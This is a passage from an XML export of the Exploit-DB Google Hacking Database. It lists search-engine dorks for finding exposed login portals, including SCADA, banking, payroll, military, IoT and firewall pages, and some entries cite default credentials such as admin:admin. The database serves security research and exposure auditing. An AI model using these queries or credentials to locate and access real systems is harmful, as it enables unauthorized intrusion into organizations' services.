<link>https://www.exploit-db.com/ghdb/1109</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login prompt&quot; inurl:GM.cgi</shortDescription>
<textualDescription>GreyMatter is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.</textualDescription>
<query>&quot;login prompt&quot; inurl:GM.cgi</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22login+prompt%22+inurl%3AGM.cgi</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>478</id>
<link>https://www.exploit-db.com/ghdb/478</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Login to Usermin&quot; inurl:20000</shortDescription>
<textualDescription>Usermin is a web interface that can be used by any user on a Unix system to easily perform tasks like reading mail, setting up SSH or configuring mail forwarding. It can be thought of as a simplified version of Webmin designed for use by normal users rather than system administrators.</textualDescription>
<query>&quot;Login to Usermin&quot; inurl:20000</query>
<querystring>https://www.google.com/search?q=%22Login+to+Usermin%22+inurl%3A20000</querystring>
<edb></edb>
<date>2004-09-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4785</id>
<link>https://www.exploit-db.com/ghdb/4785</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot; &quot;adp login&quot; -adplogin.us -adplogin.org -adplogin.net</shortDescription>
<textualDescription>Login portals from ADP Login which is mainly used in the following fields:
- Human Capital Management
- Payroll Services
- Talent Management
- HR Management
- Affordable Care Act
- Benefits Administration
- Time &amp; Attendance
- HR Business Process Outsourcing (HR BPO)
- Professional Employer Organization (PEO)
- Retirement Plans
- Insurance Plans
- Tax &amp; Compliance
- Payment Solutions
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>&quot;login&quot; &quot;adp login&quot; -adplogin.us -adplogin.org -adplogin.net</query>
<querystring>https://www.google.com/search?q=&quot;login&quot; &quot;adp login&quot; -adplogin.us -adplogin.org -adplogin.net</querystring>
<edb></edb>
<date>2018-04-17</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4734</id>
<link>https://www.exploit-db.com/ghdb/4734</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot; &quot;secure&quot; &quot;intitle:&quot;online banking&quot; -youtube -template -stackoverflow -stackexchange</shortDescription>
<textualDescription>Online banking login portals...
also try:
&quot;login&quot; &quot;secure&quot; &quot;intitle:&quot;private banking&quot; -youtube -template
-stackoverflow -stackexchange
&quot;login&quot; &quot;secure&quot; &quot;intitle:&quot;investment banking&quot; -youtube -template
-stackoverflow -stackexchange
Bruno Schmid
</textualDescription>
<query>&quot;login&quot; &quot;secure&quot; &quot;intitle:&quot;online banking&quot; -youtube -template -stackoverflow -stackexchange</query>
<querystring>https://www.google.com/search?q=&quot;login&quot; &quot;secure&quot; &quot;intitle:&quot;online banking&quot; -youtube -template -stackoverflow -stackexchange</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6144</id>
<link>https://www.exploit-db.com/ghdb/6144</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot; intitle:&quot;*board login&quot;</shortDescription>
<textualDescription># Google Dork: &quot;login&quot; intitle:&quot;*board login&quot;
# Various pages containing board login portals.
# Date: 28/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;login&quot; intitle:&quot;*board login&quot;</query>
<querystring>https://www.google.com/search?q=&quot;login&quot; intitle:&quot;*board login&quot;</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6146</id>
<link>https://www.exploit-db.com/ghdb/6146</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot; intitle:&quot;*dashboard login&quot;</shortDescription>
<textualDescription># Google Dork: &quot;login&quot; intitle:&quot;*dashboard login&quot;
# Various Dashboard login portals.
# Date: 28/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;login&quot; intitle:&quot;*dashboard login&quot;</query>
<querystring>https://www.google.com/search?q=&quot;login&quot; intitle:&quot;*dashboard login&quot;</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6400</id>
<link>https://www.exploit-db.com/ghdb/6400</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot; intitle:&quot;*payroll login&quot;</shortDescription>
<textualDescription># Google Dork: &quot;login&quot; intitle:&quot;*payroll login&quot;
# Payroll login portals.
# Date: 14/07/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;login&quot; intitle:&quot;*payroll login&quot;</query>
<querystring>https://www.google.com/search?q=&quot;login&quot; intitle:&quot;*payroll login&quot;</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6378</id>
<link>https://www.exploit-db.com/ghdb/6378</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot; intitle:&quot;*reports login&quot;</shortDescription>
<textualDescription># Google Dork : &quot;login&quot; intitle:&quot;*reports login&quot;
# Description : Various Report login portals.
# Date: 07/07/2020
# Author: Jose Praveen
</textualDescription>
<query>&quot;login&quot; intitle:&quot;*reports login&quot;</query>
<querystring>https://www.google.com/search?q=&quot;login&quot; intitle:&quot;*reports login&quot;</querystring>
<edb></edb>
<date>2020-07-07</date>
<author>Jose Praveen</author>
</entry>
<entry>
<id>6145</id>
<link>https://www.exploit-db.com/ghdb/6145</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot; intitle:&quot;*scada login&quot;</shortDescription>
<textualDescription># Google Dork: &quot;login&quot; intitle:&quot;*scada login&quot;
# Various SCADA login portals.
# Date: 28/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;login&quot; intitle:&quot;*scada login&quot;</query>
<querystring>https://www.google.com/search?q=&quot;login&quot; intitle:&quot;*scada login&quot;</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6261</id>
<link>https://www.exploit-db.com/ghdb/6261</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot; intitle:&quot;intext:&quot;Welcome to Member&quot; login&quot;</shortDescription>
<textualDescription># Google Dork: &quot;login&quot; intitle:&quot;intext:&quot;Welcome to Member&quot; login&quot;
# Various member login pages.
# Date: 10/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;login&quot; intitle:&quot;intext:&quot;Welcome to Member&quot; login&quot;</query>
<querystring>https://www.google.com/search?q=&quot;login&quot; intitle:&quot;intext:&quot;Welcome to Member&quot; login&quot;</querystring>
<edb></edb>
<date>2020-06-10</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5916</id>
<link>https://www.exploit-db.com/ghdb/5916</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot; intitle:&quot;iot login&quot;</shortDescription>
<textualDescription># Google Dork: &quot;login&quot; intitle:&quot;iot login&quot;
# Pages containing various IoT () login portals can be found.
# Date: 17/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;login&quot; intitle:&quot;iot login&quot;</query>
<querystring>https://www.google.com/search?q=&quot;login&quot; intitle:&quot;iot login&quot;</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4747</id>
<link>https://www.exploit-db.com/ghdb/4747</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot; intitle:&quot;scada login&quot;</shortDescription>
<textualDescription>Scada login portals
Bruno Schmid
</textualDescription>
<query>&quot;login&quot; intitle:&quot;scada login&quot;</query>
<querystring>https://www.google.com/search?q=&quot;login&quot; intitle:&quot;scada login&quot;</querystring>
<edb></edb>
<date>2018-04-06</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4779</id>
<link>https://www.exploit-db.com/ghdb/4779</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot; inurl:&quot;account/auth&quot; -github -gitlab -stackoverflow</shortDescription>
<textualDescription>Login portals... Most of them use ASPT.NET technology.
Bruno Schmid
https://www.linkedin.com/in/schmidbruno
</textualDescription>
<query>&quot;login&quot; inurl:&quot;account/auth&quot; -github -gitlab -stackoverflow</query>
<querystring>https://www.google.com/search?q=&quot;login&quot; inurl:&quot;account/auth&quot; -github -gitlab -stackoverflow</querystring>
<edb></edb>
<date>2018-04-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5051</id>
<link>https://www.exploit-db.com/ghdb/5051</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;login&quot;:</shortDescription>
<textualDescription>&quot;login&quot;:
This Google Dork discovers thousands of login portals.
- Gionathan &quot;John&quot; Reale
</textualDescription>
<query>&quot;login&quot;:</query>
<querystring>https://www.google.com/search?q=&quot;login&quot;:</querystring>
<edb></edb>
<date>2018-12-05</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>3782</id>
<link>https://www.exploit-db.com/ghdb/3782</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;mailing list memberships reminder&quot;</shortDescription>
<textualDescription>Hi,
By default, while subscribing to a mailing list on a website, running
Mailman (GNU) for mailing list management, the user has got options to
manage his/her subscription options.
There is an option of getting password reminder email for this list
once in a month.
And, by default, this option is set to Yes.
Along with sending the password reminder mail in *plain text* to the
users, it gets archived on the sites too.
Thanks,
Sagar Belure</textualDescription>
<query>&quot;mailing list memberships reminder&quot;</query>
<querystring>https://www.google.com/search?q=&quot;mailing list memberships reminder&quot;</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>861</id>
<link>https://www.exploit-db.com/ghdb/861</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Microsoft CRM : Unsupported Browser Version&quot;</shortDescription>
<textualDescription>Microsoft CRM Login portal.MS says:Microsoft CRM integrates with Microsoft Office, Microsoft Business Solutions for Financial Management, and other business systems to give employees a complete view of customer information. The ease of integration with Microsoft Office is of particular valueâ€ââ¬Âenabling staff to access Microsoft CRM information from Microsoft Office Outlook and work online or offline with access to sales functionality.</textualDescription>
<query>&quot;Microsoft CRM : Unsupported Browser Version&quot;</query>
<querystring>https://www.google.com/search?q=%22Microsoft+CRM+%3A+Unsupported+Browser+Version%22</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6952</id>
<link>https://www.exploit-db.com/ghdb/6952</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Name&quot; &quot;Password&quot; intitle:&quot;Business LAN&quot;</shortDescription>
<textualDescription>&quot;Name&quot; &quot;Password&quot; intitle:&quot;Business LAN&quot;</textualDescription>
<query>&quot;Name&quot; &quot;Password&quot; intitle:&quot;Business LAN&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Name&quot; &quot;Password&quot; intitle:&quot;Business LAN&quot;</querystring>
<edb></edb>
<date>2021-05-21</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5155</id>
<link>https://www.exploit-db.com/ghdb/5155</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;online learning powered by bksb&quot;</shortDescription>
<textualDescription>Find school &amp; college login portals for BKSB.
~ CrimsonTorso
</textualDescription>
<query>&quot;online learning powered by bksb&quot;</query>
<querystring>https://www.google.com/search?q=&quot;online learning powered by bksb&quot;</querystring>
<edb></edb>
<date>2019-03-13</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>601</id>
<link>https://www.exploit-db.com/ghdb/601</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;OPENSRS Domain Management&quot; inurl:manage.cgi</shortDescription>
<textualDescription>OpenSRS Domain Management SystemNo vulnerabilities are reported to security focus.</textualDescription>
<query>&quot;OPENSRS Domain Management&quot; inurl:manage.cgi</query>
<querystring>https://www.google.com/search?q=%22OPENSRS+Domain+Management%22+inurl%3Amanage.cgi</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4762</id>
<link>https://www.exploit-db.com/ghdb/4762</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Oracle peoplesoft sign in&quot; inurl:&quot;cmd=login?&quot; -github -stackoverflow -gitlab</shortDescription>
<textualDescription>Oracle PeopleSoft login portals
Bruno Schmid
</textualDescription>
<query>&quot;Oracle peoplesoft sign in&quot; inurl:&quot;cmd=login?&quot; -github -stackoverflow -gitlab</query>
<querystring>https://www.google.com/search?q=&quot;Oracle peoplesoft sign in&quot; inurl:&quot;cmd=login?&quot; -github -stackoverflow -gitlab</querystring>
<edb></edb>
<date>2018-04-12</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4874</id>
<link>https://www.exploit-db.com/ghdb/4874</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;PaperCut Login&quot;</shortDescription>
<textualDescription>Find login portals for PaperCut printing software.
~CrimsonTorso
</textualDescription>
<query>&quot;PaperCut Login&quot;</query>
<querystring>https://www.google.com/search?q=&quot;PaperCut Login&quot;</querystring>
<edb></edb>
<date>2018-06-25</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>817</id>
<link>https://www.exploit-db.com/ghdb/817</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;pcANYWHERE EXPRESS Java Client&quot;</shortDescription>
<textualDescription>This search will reveal the java script program that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web.</textualDescription>
<query>&quot;pcANYWHERE EXPRESS Java Client&quot;</query>
<querystring>https://www.google.com/search?q=%22pcANYWHERE+EXPRESS+Java+Client%22</querystring>
<edb></edb>
<date>2005-01-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1089</id>
<link>https://www.exploit-db.com/ghdb/1089</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Please authenticate yourself to get access to the management interface&quot;</shortDescription>
<textualDescription>Photo gallery managment system login</textualDescription>
<query>&quot;Please authenticate yourself to get access to the management interface&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Please+authenticate+yourself+to+get+access+to+the+management+interface%22</querystring>
<edb></edb>
<date>2005-08-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>229</id>
<link>https://www.exploit-db.com/ghdb/229</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;please log in&quot;</shortDescription>
<textualDescription>This is a simple search for a login page. Attackers view login pages as the &quot;front door&quot; to a site, but the information about where this page is stored and how it is presented can provide clues about breaking into a site.</textualDescription>
<query>&quot;please log in&quot;</query>
<querystring>https://www.google.com/search?q=%22please+log+in%22</querystring>
<edb></edb>
<date>2004-05-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1143</id>
<link>https://www.exploit-db.com/ghdb/1143</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Please login with admin pass&quot; -&quot;leak&quot; -sourceforge</shortDescription>
<textualDescription>PHPsFTPd is a web based administration and configuration interface for the SLimFTPd ftp serverIt can be used an any http server that suports PHP and does not need a database or adittional php modules, only SlimFTPD It allows the administrators of the ftp server to configurate it from within this interface as opposed to its native ascii conf.file It shows statistics about the users that accesed the server , the files that were downloaded , server breakdowns etcAdmin password leak:http://cert.uni-stuttgart.de/archive/bugtraq/2005/07/msg00209.html</textualDescription>
<query>&quot;Please login with admin pass&quot; -&quot;leak&quot; -sourceforge</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Please+login+with+admin+pass%22+-%22leak%22+-sourceforge</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>5221</id>
<link>https://www.exploit-db.com/ghdb/5221</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;please sign in&quot; &quot;sign in&quot; &quot;gophish&quot; +&quot;login&quot;</shortDescription>
<textualDescription>Description: Find login portal pages for Gophish script
setups. Default login creds are admin:gophish.
Category: Pages Containing Login Portals
Author: edm0nd https://twitter.com/edmond_major
</textualDescription>
<query>&quot;please sign in&quot; &quot;sign in&quot; &quot;gophish&quot; +&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=&quot;please sign in&quot; &quot;sign in&quot; &quot;gophish&quot; +&quot;login&quot;</querystring>
<edb></edb>
<date>2019-05-23</date>
<author>edm0nd</author>
</entry>
<entry>
<id>434</id>
<link>https://www.exploit-db.com/ghdb/434</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;powered by CuteNews&quot; &quot;2003..2005 CutePHP&quot;</shortDescription>
<textualDescription>This finds sites powered by various CuteNews versions. An attacker use this list and search the online advisories for vulnerabilities. For example: &quot;CuteNews HTML Injection Vulnerability Via Commentaries&quot;, Vulnerable Systems: * CuteNews version 1.3.x (http://www.securiteam.com/unixfocus/5BP0N20DFA.html)</textualDescription>
<query>&quot;powered by CuteNews&quot; &quot;2003..2005 CutePHP&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22powered+by+CuteNews%22+%222003..2005+CutePHP%22</querystring>
<edb></edb>
<date>2004-08-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>962</id>
<link>https://www.exploit-db.com/ghdb/962</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Powered by DWMail&quot; password intitle:dwmail</shortDescription>
<textualDescription>What is DWmailâââ¬Å¾Ã¢?: DWmailâââ¬Å¾Ã¢ is an 'intelligent' Web based email application written in the scripting language, PHP. DWmailâââ¬Å¾Ã¢ allows you and your visitors to access, manage and send email using any POP3 or IMAP4 compliant email account. Simply enter your email address and password to check your email.</textualDescription>
<query>&quot;Powered by DWMail&quot; password intitle:dwmail</query>
<querystring>https://www.google.com/search?q=%22Powered+by+DWMail%22+password+intitle%3Adwmail</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1187</id>
<link>https://www.exploit-db.com/ghdb/1187</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Powered by Merak Mail Server Software&quot; -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff</shortDescription>
<textualDescription>Webmail login portals for Merak Email ServerMerak Email Server Suite consists of multiple awards winner Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWare</textualDescription>
<query>&quot;Powered by Merak Mail Server Software&quot; -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Powered+by+Merak+Mail+Server+Software%22+-.gov+-.mil+-.edu+-site%3Amerakmailserver.com+-johnny.ihackstuff&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1253</id>
<link>https://www.exploit-db.com/ghdb/1253</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Powered by Midmart Messageboard&quot; &quot;Administrator Login&quot;</shortDescription>
<textualDescription>Midmart Messageboard lets you run a highly customizable bulletin board with a very nice user interface (similar to Yahoo Clubs) on your web site in few minutes. Many other features included. Rar found it murfie cleaned it up.</textualDescription>
<query>&quot;Powered by Midmart Messageboard&quot; &quot;Administrator Login&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Midmart+Messageboard%22+%22Administrator+Login%22&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2006-01-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1108</id>
<link>https://www.exploit-db.com/ghdb/1108</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Powered by Monster Top List&quot; MTL numrange:200-</shortDescription>
<textualDescription>2 Step dork - Change url to add filename &quot;admin.php&quot; (just remove index.php&amp;stuff=1&amp;me=2 if you have to) for the admin login.This search finds more pages rather than focusing on the admin login page itself, thus the 2 step dork is more effective.</textualDescription>
<query>&quot;Powered by Monster Top List&quot; MTL numrange:200-</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22Powered+by+Monster+Top+List%22+MTL+numrange%3A200-</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4836</id>
<link>https://www.exploit-db.com/ghdb/4836</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Powered by Open Source Chat Platform Rocket.Chat.&quot;</shortDescription>
<textualDescription>This Google Dork displays open Login Portals for RocketChat.
Found by Lewis, @LewisBugBounty // fifteen@riseup.net.
</textualDescription>
<query>&quot;Powered by Open Source Chat Platform Rocket.Chat.&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by Open Source Chat Platform Rocket.Chat.&quot;</querystring>
<edb></edb>
<date>2018-06-04</date>
<author>LewisBugBounty</author>
</entry>
<entry>
<id>902</id>
<link>https://www.exploit-db.com/ghdb/902</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Powered by UebiMiau&quot; -site:sourceforge.net</shortDescription>
<textualDescription>UebiMiau is a simple, yet efficient cross-plataform POP3/IMAP mail reader written in PHP. It's have some many features, such as: Folders, View and Send Attachments, Preferences, Search, Quota Limit</textualDescription>
<query>&quot;Powered by UebiMiau&quot; -site:sourceforge.net</query>
<querystring>https://www.google.com/search?q=%22Powered+by+UebiMiau%22+-site%3Asourceforge.net</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4876</id>
<link>https://www.exploit-db.com/ghdb/4876</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Powered byPlanet eStream&quot;</shortDescription>
<textualDescription>Find websites using byPlanet eStream video software login portals.
~ CrimsonTorso
</textualDescription>
<query>&quot;Powered byPlanet eStream&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered byPlanet eStream&quot;</querystring>
<edb></edb>
<date>2018-06-26</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>4986</id>
<link>https://www.exploit-db.com/ghdb/4986</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;ProQuest provides subscription access to numerous premium technical journals, dissertations and other information databases.&quot;</shortDescription>
<textualDescription>Find login portals on websites using ProQuest.
~ CrimsonTorso
</textualDescription>
<query>&quot;ProQuest provides subscription access to numerous premium technical journals, dissertations and other information databases.&quot;</query>
<querystring>https://www.google.com/search?q=&quot;ProQuest provides subscription access to numerous premium technical journals, dissertations and other information databases.&quot;</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>1431</id>
<link>https://www.exploit-db.com/ghdb/1431</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Remote Supervisor Adapter II&quot; inurl:userlogin_logo.ssi</shortDescription>
<textualDescription>IBM e-server's login pages.
Author: DigiP</textualDescription>
<query>&quot;Remote Supervisor Adapter II&quot; inurl:userlogin_logo.ssi</query>
<querystring>https://www.google.com/search?q=%22Remote+Supervisor+Adapter+II%22+inurl%3Auserlogin_logo.ssi&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6525</id>
<link>https://www.exploit-db.com/ghdb/6525</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Retrieve Your Password&quot; site:*/recoverpassword.aspx</shortDescription>
<textualDescription># Google Dork: &quot;Retrieve Your Password&quot; site:*/recoverpassword.aspx
# Login portals (password recovery).
# Date: 22/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Retrieve Your Password&quot; site:*/recoverpassword.aspx</query>
<querystring>https://www.google.com/search?q=&quot;Retrieve Your Password&quot; site:*/recoverpassword.aspx</querystring>
<edb></edb>
<date>2020-09-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6941</id>
<link>https://www.exploit-db.com/ghdb/6941</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;Saferoads VMS&quot; &quot;login&quot;</shortDescription>
<textualDescription># Dork: &quot;Saferoads VMS&quot; &quot;login&quot;
# Find login portals for Roadsigns
</textualDescription>
<query>&quot;Saferoads VMS&quot; &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Saferoads VMS&quot; &quot;login&quot;</querystring>
<edb></edb>
<date>2021-05-18</date>
<author>Strontium</author>
</entry>
<entry>
<id>4733</id>
<link>https://www.exploit-db.com/ghdb/4733</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;service&quot; | &quot;military&quot; | &quot;federal&quot; &quot;intitle:&quot;login form&quot; -youtube -template -stackoverflow</shortDescription>
<textualDescription>Law, federal departments and military and service related login portals.
Bruno Schmid</textualDescription>
<query>&quot;service&quot; | &quot;military&quot; | &quot;federal&quot; &quot;intitle:&quot;login form&quot; -youtube -template -stackoverflow</query>
<querystring>https://www.google.com/search?q=&quot;service&quot; | &quot;military&quot; | &quot;federal&quot; &quot;intitle:&quot;login form&quot; -youtube -template -stackoverflow</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>1200</id>
<link>https://www.exploit-db.com/ghdb/1200</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;site info for&quot; &quot;Enter Admin Password&quot;</shortDescription>
<textualDescription>This will take you to the cash crusader admin login screen. It is my first google hack.. also try adding index.php at the end, have fun people :)</textualDescription>
<query>&quot;site info for&quot; &quot;Enter Admin Password&quot;</query>
<querystring>https://www.google.com/search?q=%22site+info+for%22+%22Enter+Admin+Password%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>6522</id>
<link>https://www.exploit-db.com/ghdb/6522</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;SonicWALL - Authentication&quot; inurl:/auth.html</shortDescription>
<textualDescription># Google Dork: &quot;SonicWALL - Authentication&quot; inurl:/auth.html
# Pages containing login portals.
# Date: 3/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;SonicWALL - Authentication&quot; inurl:/auth.html</query>
<querystring>https://www.google.com/search?q=&quot;SonicWALL - Authentication&quot; inurl:/auth.html</querystring>
<edb></edb>
<date>2020-09-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1358</id>
<link>https://www.exploit-db.com/ghdb/1358</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;SquirrelMail version&quot; &quot;By the SquirrelMail Development Team&quot;</shortDescription>
<textualDescription>More SquirrelMail Logins</textualDescription>
<query>&quot;SquirrelMail version&quot; &quot;By the SquirrelMail Development Team&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22SquirrelMail+version%22+%22By+the+SquirrelMail+Development+Team%22</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1400</id>
<link>https://www.exploit-db.com/ghdb/1400</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;SurgeMAIL&quot; inurl:/cgi/user.cgi ext:cgi</shortDescription>
<textualDescription>surgemail is an email server from netwinsite.com that can be accessed by a web browser. This dork finds the web logins.</textualDescription>
<query>&quot;SurgeMAIL&quot; inurl:/cgi/user.cgi ext:cgi</query>
<querystring>https://www.google.com/search?q=%22SurgeMAIL%22+inurl:/cgi/user.cgi+ext:cgi&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-08-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>598</id>
<link>https://www.exploit-db.com/ghdb/598</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;SysCP - login&quot;</shortDescription>
<textualDescription>sysCP: Open Source server management tool for Debian LinuxNo vulnerabilities are reported to security focus.</textualDescription>
<query>&quot;SysCP - login&quot;</query>
<querystring>https://www.google.com/search?q=%22SysCP+-+login%22</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5954</id>
<link>https://www.exploit-db.com/ghdb/5954</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;The default username and password is admin:admin&quot; intitle:Login OR inurl:login.php</shortDescription>
<textualDescription># Google Dork: &quot;The default username and password is admin:admin&quot;
intitle:Login OR inurl:login.php
# Default user name and password admin:admin.
# Date: 27/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;The default username and password is admin:admin&quot; intitle:Login OR inurl:login.php</query>
<querystring>https://www.google.com/search?q=&quot;The default username and password is admin:admin&quot; intitle:Login OR inurl:login.php</querystring>
<edb></edb>
<date>2020-04-27</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1190</id>
<link>https://www.exploit-db.com/ghdb/1190</link>
<category>Pages Containing Login Portals</category>
<shortDescription>&quot;This is a restricted Access Server&quot; &quot;Javascript Not Enabled!&quot;|&quot;Messenger Express&quot; -edu -ac</shortDescription>
<textualDescription>Mostly Login Pages for iPlanet Messenger Express, which is a web-based electronic mail program that enables end users to access their mailboxes using a browser. Messenger Express clients send mail to a specialized web server that is part of iPlanet Messaging Server. Thanks to the forum members for cleaning up the search.</textualDescription>
<query>&quot;This is a restricted Access Server&quot; &quot;Javascript Not Enabled!&quot;|&quot;Messenger Express&quot; -edu -ac</query>
<querystring>https://www.google.com/search?q=%22This+is+a+restricted+Access+Server%22+%22Javascript+Not+Enabled!%22%7C%22Messenger+Express%22+-edu+-ac&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1042</id>
